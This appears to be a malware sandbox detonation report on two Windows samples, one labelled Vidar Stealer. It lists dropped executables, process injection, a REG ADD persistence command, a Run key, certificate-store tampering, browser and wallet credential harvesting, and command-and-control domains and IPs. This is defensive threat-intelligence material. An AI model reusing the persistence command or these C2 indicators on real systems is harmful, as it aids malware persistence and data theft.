| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\FsusJeDbv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FsusJeDbv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FsusJeDbv.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386.exe | N/A |
| N/A | N/A | C:\ProgramData\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\FsusJeDbv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\FsusJeDbv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
Reads user/profile data of web browsers
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
| N/A | freegeoip.app | N/A | N/A |
| N/A | freegeoip.app | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1076 set thread context of 332 | N/A | C:\Users\Admin\AppData\Local\Temp\71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386.exe | C:\Users\Admin\AppData\Local\Temp\71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386.exe |
| PID 1524 set thread context of 948 | N/A | C:\ProgramData\images.exe | C:\Users\Admin\AppData\Local\Temp\images.exe |
| PID 472 set thread context of 1588 | N/A | C:\Users\Admin\AppData\Roaming\FsusJeDbv.exe | C:\Users\Admin\AppData\Local\Temp\FsusJeDbv.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386.exe | N/A |
| N/A | N/A | C:\ProgramData\images.exe | N/A |
| N/A | N/A | C:\ProgramData\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\FsusJeDbv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\FsusJeDbv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\FsusJeDbv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\FsusJeDbv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\FsusJeDbv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\FsusJeDbv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FsusJeDbv.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\images.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\FsusJeDbv.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\FsusJeDbv.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386.exe
"C:\Users\Admin\AppData\Local\Temp\71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386.exe"
C:\Users\Admin\AppData\Local\Temp\71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386.exe
C:\Users\Admin\AppData\Local\Temp\71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
C:\ProgramData\images.exe
"C:\ProgramData\images.exe"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
C:\Users\Admin\AppData\Local\Temp\images.exe
C:\Users\Admin\AppData\Local\Temp\images.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Users\Admin\AppData\Roaming\FsusJeDbv.exe
"C:\Users\Admin\AppData\Roaming\FsusJeDbv.exe"
C:\Users\Admin\AppData\Local\Temp\FsusJeDbv.exe
C:\Users\Admin\AppData\Local\Temp\FsusJeDbv.exe
C:\Users\Admin\AppData\Local\Temp\FsusJeDbv.exe
C:\Users\Admin\AppData\Local\Temp\FsusJeDbv.exe
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | sdafsdffssffs.ydns.eu | udp |
| N/A | 203.159.80.107:6703 | sdafsdffssffs.ydns.eu | tcp |
| N/A | 8.8.8.8:53 | hutyrtit.ydns.eu | udp |
| N/A | 203.159.80.107:80 | hutyrtit.ydns.eu | tcp |
| N/A | 8.8.8.8:53 | checkip.dyndns.org | udp |
| N/A | 132.226.247.73:80 | checkip.dyndns.org | tcp |
| N/A | 8.8.8.8:53 | freegeoip.app | udp |
| N/A | 104.21.19.200:443 | freegeoip.app | tcp |
Files
memory/1076-60-0x0000000000290000-0x0000000000291000-memory.dmp
memory/1076-62-0x0000000005070000-0x0000000005071000-memory.dmp
memory/1076-63-0x0000000005075000-0x0000000005086000-memory.dmp
memory/1076-64-0x0000000002070000-0x00000000020BC000-memory.dmp
memory/1076-69-0x00000000048F0000-0x0000000004953000-memory.dmp
memory/332-70-0x0000000000400000-0x000000000055E000-memory.dmp
memory/332-71-0x0000000000405E28-mapping.dmp
memory/332-72-0x0000000075AA1000-0x0000000075AA3000-memory.dmp
memory/332-73-0x0000000000400000-0x000000000055E000-memory.dmp
memory/1472-74-0x0000000000000000-mapping.dmp
memory/1524-76-0x0000000000000000-mapping.dmp
memory/1836-77-0x0000000000000000-mapping.dmp
\ProgramData\images.exe
| MD5 | 44020c86a10168041f6ddde52fd3f4d4 |
| SHA1 | 0dc9cf42fb0b5670d54307c9eb41cbc43bd66454 |
| SHA256 | 71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386 |
| SHA512 | 163de8e93558e30b09f6a89dd3be3627c9fbd076ba28001b19db0efc9e33bf6ed4b1ba62d63d29403af4c7c9108b92bcb9ea0aa0978023d3398a36534049683b |
C:\ProgramData\images.exe
| MD5 | 44020c86a10168041f6ddde52fd3f4d4 |
| SHA1 | 0dc9cf42fb0b5670d54307c9eb41cbc43bd66454 |
| SHA256 | 71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386 |
| SHA512 | 163de8e93558e30b09f6a89dd3be3627c9fbd076ba28001b19db0efc9e33bf6ed4b1ba62d63d29403af4c7c9108b92bcb9ea0aa0978023d3398a36534049683b |
C:\ProgramData\images.exe
| MD5 | 44020c86a10168041f6ddde52fd3f4d4 |
| SHA1 | 0dc9cf42fb0b5670d54307c9eb41cbc43bd66454 |
| SHA256 | 71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386 |
| SHA512 | 163de8e93558e30b09f6a89dd3be3627c9fbd076ba28001b19db0efc9e33bf6ed4b1ba62d63d29403af4c7c9108b92bcb9ea0aa0978023d3398a36534049683b |
memory/1524-80-0x0000000000880000-0x0000000000881000-memory.dmp
memory/1524-82-0x00000000044A0000-0x00000000044A1000-memory.dmp
memory/1524-83-0x00000000044A5000-0x00000000044B6000-memory.dmp
\Users\Admin\AppData\Local\Temp\images.exe
| MD5 | 44020c86a10168041f6ddde52fd3f4d4 |
| SHA1 | 0dc9cf42fb0b5670d54307c9eb41cbc43bd66454 |
| SHA256 | 71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386 |
| SHA512 | 163de8e93558e30b09f6a89dd3be3627c9fbd076ba28001b19db0efc9e33bf6ed4b1ba62d63d29403af4c7c9108b92bcb9ea0aa0978023d3398a36534049683b |
memory/948-92-0x0000000000405E28-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\images.exe
| MD5 | 44020c86a10168041f6ddde52fd3f4d4 |
| SHA1 | 0dc9cf42fb0b5670d54307c9eb41cbc43bd66454 |
| SHA256 | 71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386 |
| SHA512 | 163de8e93558e30b09f6a89dd3be3627c9fbd076ba28001b19db0efc9e33bf6ed4b1ba62d63d29403af4c7c9108b92bcb9ea0aa0978023d3398a36534049683b |
memory/948-95-0x0000000000400000-0x000000000055E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\images.exe
| MD5 | 44020c86a10168041f6ddde52fd3f4d4 |
| SHA1 | 0dc9cf42fb0b5670d54307c9eb41cbc43bd66454 |
| SHA256 | 71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386 |
| SHA512 | 163de8e93558e30b09f6a89dd3be3627c9fbd076ba28001b19db0efc9e33bf6ed4b1ba62d63d29403af4c7c9108b92bcb9ea0aa0978023d3398a36534049683b |
memory/996-97-0x0000000000000000-mapping.dmp
memory/996-98-0x00000000000B0000-0x00000000000B1000-memory.dmp
memory/948-99-0x00000000037C0000-0x00000000038C0000-memory.dmp
\Users\Admin\AppData\Roaming\FsusJeDbv.exe
| MD5 | 50c12d57dba3671ee37e90ef48c113cb |
| SHA1 | 1478f7311bda81efc961811c2d2f28a782f7dc44 |
| SHA256 | 3b1c4fb3ad9793fe6347978b9a5b399d0ef84ad25c11ea191d217cd173b6a05d |
| SHA512 | 1a2f3fa86c747413867f74640d9d0219ba25aa5619b52d88c05dfdaecf1fa7e211e760914227995c8b55be72fecc02b26b23b38fbb655014d4e6e7c643749c6d |
memory/472-101-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\FsusJeDbv.exe
| MD5 | 50c12d57dba3671ee37e90ef48c113cb |
| SHA1 | 1478f7311bda81efc961811c2d2f28a782f7dc44 |
| SHA256 | 3b1c4fb3ad9793fe6347978b9a5b399d0ef84ad25c11ea191d217cd173b6a05d |
| SHA512 | 1a2f3fa86c747413867f74640d9d0219ba25aa5619b52d88c05dfdaecf1fa7e211e760914227995c8b55be72fecc02b26b23b38fbb655014d4e6e7c643749c6d |
C:\Users\Admin\AppData\Roaming\FsusJeDbv.exe
| MD5 | 50c12d57dba3671ee37e90ef48c113cb |
| SHA1 | 1478f7311bda81efc961811c2d2f28a782f7dc44 |
| SHA256 | 3b1c4fb3ad9793fe6347978b9a5b399d0ef84ad25c11ea191d217cd173b6a05d |
| SHA512 | 1a2f3fa86c747413867f74640d9d0219ba25aa5619b52d88c05dfdaecf1fa7e211e760914227995c8b55be72fecc02b26b23b38fbb655014d4e6e7c643749c6d |
memory/472-104-0x00000000010B0000-0x00000000010B1000-memory.dmp
memory/472-106-0x0000000000470000-0x0000000000471000-memory.dmp
memory/472-107-0x0000000000AC0000-0x0000000000B0A000-memory.dmp
memory/472-112-0x0000000004FA0000-0x0000000005012000-memory.dmp
\Users\Admin\AppData\Local\Temp\FsusJeDbv.exe
| MD5 | 50c12d57dba3671ee37e90ef48c113cb |
| SHA1 | 1478f7311bda81efc961811c2d2f28a782f7dc44 |
| SHA256 | 3b1c4fb3ad9793fe6347978b9a5b399d0ef84ad25c11ea191d217cd173b6a05d |
| SHA512 | 1a2f3fa86c747413867f74640d9d0219ba25aa5619b52d88c05dfdaecf1fa7e211e760914227995c8b55be72fecc02b26b23b38fbb655014d4e6e7c643749c6d |
C:\Users\Admin\AppData\Local\Temp\FsusJeDbv.exe
| MD5 | 50c12d57dba3671ee37e90ef48c113cb |
| SHA1 | 1478f7311bda81efc961811c2d2f28a782f7dc44 |
| SHA256 | 3b1c4fb3ad9793fe6347978b9a5b399d0ef84ad25c11ea191d217cd173b6a05d |
| SHA512 | 1a2f3fa86c747413867f74640d9d0219ba25aa5619b52d88c05dfdaecf1fa7e211e760914227995c8b55be72fecc02b26b23b38fbb655014d4e6e7c643749c6d |
\Users\Admin\AppData\Local\Temp\FsusJeDbv.exe
| MD5 | 50c12d57dba3671ee37e90ef48c113cb |
| SHA1 | 1478f7311bda81efc961811c2d2f28a782f7dc44 |
| SHA256 | 3b1c4fb3ad9793fe6347978b9a5b399d0ef84ad25c11ea191d217cd173b6a05d |
| SHA512 | 1a2f3fa86c747413867f74640d9d0219ba25aa5619b52d88c05dfdaecf1fa7e211e760914227995c8b55be72fecc02b26b23b38fbb655014d4e6e7c643749c6d |
memory/1588-116-0x0000000000400000-0x0000000000426000-memory.dmp
memory/1588-117-0x000000000042010E-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\FsusJeDbv.exe
| MD5 | 50c12d57dba3671ee37e90ef48c113cb |
| SHA1 | 1478f7311bda81efc961811c2d2f28a782f7dc44 |
| SHA256 | 3b1c4fb3ad9793fe6347978b9a5b399d0ef84ad25c11ea191d217cd173b6a05d |
| SHA512 | 1a2f3fa86c747413867f74640d9d0219ba25aa5619b52d88c05dfdaecf1fa7e211e760914227995c8b55be72fecc02b26b23b38fbb655014d4e6e7c643749c6d |
C:\Users\Admin\AppData\Local\Temp\FsusJeDbv.exe
| MD5 | 50c12d57dba3671ee37e90ef48c113cb |
| SHA1 | 1478f7311bda81efc961811c2d2f28a782f7dc44 |
| SHA256 | 3b1c4fb3ad9793fe6347978b9a5b399d0ef84ad25c11ea191d217cd173b6a05d |
| SHA512 | 1a2f3fa86c747413867f74640d9d0219ba25aa5619b52d88c05dfdaecf1fa7e211e760914227995c8b55be72fecc02b26b23b38fbb655014d4e6e7c643749c6d |
memory/1588-120-0x0000000000400000-0x0000000000426000-memory.dmp
memory/472-122-0x0000000000475000-0x0000000000486000-memory.dmp
memory/1588-123-0x00000000049D0000-0x00000000049D1000-memory.dmp
memory/948-124-0x0000000004850000-0x000000000549A000-memory.dmp
\Users\Admin\AppData\Local\Temp\msvcp140.dll
| MD5 | 109f0f02fd37c84bfc7508d4227d7ed5 |
| SHA1 | ef7420141bb15ac334d3964082361a460bfdb975 |
| SHA256 | 334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4 |
| SHA512 | 46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39 |
\Users\Admin\AppData\Local\Temp\vcruntime140.dll
| MD5 | 7587bf9cb4147022cd5681b015183046 |
| SHA1 | f2106306a8f6f0da5afb7fc765cfa0757ad5a628 |
| SHA256 | c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d |
| SHA512 | 0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f |
\Users\Admin\AppData\Local\Temp\mozglue.dll
| MD5 | 75f8cc548cabf0cc800c25047e4d3124 |
| SHA1 | 602676768f9faecd35b48c38a0632781dfbde10c |
| SHA256 | fb419a60305f17359e2ac0510233ee80e845885eee60607715c67dd88e501ef0 |
| SHA512 | ed831c9c769aef3be253c52542cf032afa0a8fa5fe25ca704db65ee6883c608220df7102ac2b99ee9c2e599a0f5db99fd86894a4b169e68440eb1b0d0012672f |
\Users\Admin\AppData\Local\Temp\nss3.dll
| MD5 | d7858e8449004e21b01d468e9fd04b82 |
| SHA1 | 9524352071ede21c167e7e4f106e9526dc23ef4e |
| SHA256 | 78758bf7f3b3b5e3477e38354acd32d787bc1286c8bd9b873471b9c195e638db |
| SHA512 | 1e2c981e6c0ca36c60c6e9cae9548b866d5c524df837095b30d618d9c322def7134c20de820105400dd1b58076b66d90274f67773ac6ba914f611b419babb440 |
\Users\Admin\AppData\Local\Temp\freebl3.dll
| MD5 | ef12ab9d0b231b8f898067b2114b1bc0 |
| SHA1 | 6d90f27b2105945f9bb77039e8b892070a5f9442 |
| SHA256 | 2b00fc4f541ac10c94e3556ff28e30a801811c36422546a546a445aca3f410f7 |
| SHA512 | 2aa62bfba556ad8f042942dd25aa071ff6677c257904377c1ec956fd9e862abcbf379e0cfd8c630c303a32ece75618c24e3eef58bddb705c427985b944689193 |
\Users\Admin\AppData\Local\Temp\softokn3.dll
| MD5 | 471c983513694ac3002590345f2be0da |
| SHA1 | 6612b9af4ff6830fa9b7d4193078434ef72f775b |
| SHA256 | bb3ff746471116c6ad0339fa0522aa2a44a787e33a29c7b27649a054ecd4d00f |
| SHA512 | a9b0fb923bc3b567e933de10b141a3e9213640e3d790b4c4d753cf220d55593ae8026102909969ba6bfc22da3b2fcd01e30a9f5a74bd14a0fdec9beaf0fb1410 |
Analysis: behavioral28
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:35
Platform
win7v20210408
Max time kernel
150s
Max time network
182s
Command Line
Signatures
Vidar
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\0dc040fd-d0ca-44dd-bdf9-02f2844c67ef\build2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\0dc040fd-d0ca-44dd-bdf9-02f2844c67ef\build2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\b46544cb-1721-4c10-9f1b-6501dc4a3d75\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe | N/A |
Loads dropped DLL
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Reads user/profile data of web browsers
Accesses 2FA software files, possible credential harvesting
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\b46544cb-1721-4c10-9f1b-6501dc4a3d75\\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe\" --AutoStart" | C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe | N/A |
Checks installed software on the system
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1884 set thread context of 1264 | N/A | C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe | C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe |
| PID 1600 set thread context of 1124 | N/A | C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe | C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe |
| PID 1300 set thread context of 1740 | N/A | C:\Users\Admin\AppData\Local\0dc040fd-d0ca-44dd-bdf9-02f2844c67ef\build2.exe | C:\Users\Admin\AppData\Local\0dc040fd-d0ca-44dd-bdf9-02f2844c67ef\build2.exe |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\0dc040fd-d0ca-44dd-bdf9-02f2844c67ef\build2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\0dc040fd-d0ca-44dd-bdf9-02f2844c67ef\build2.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e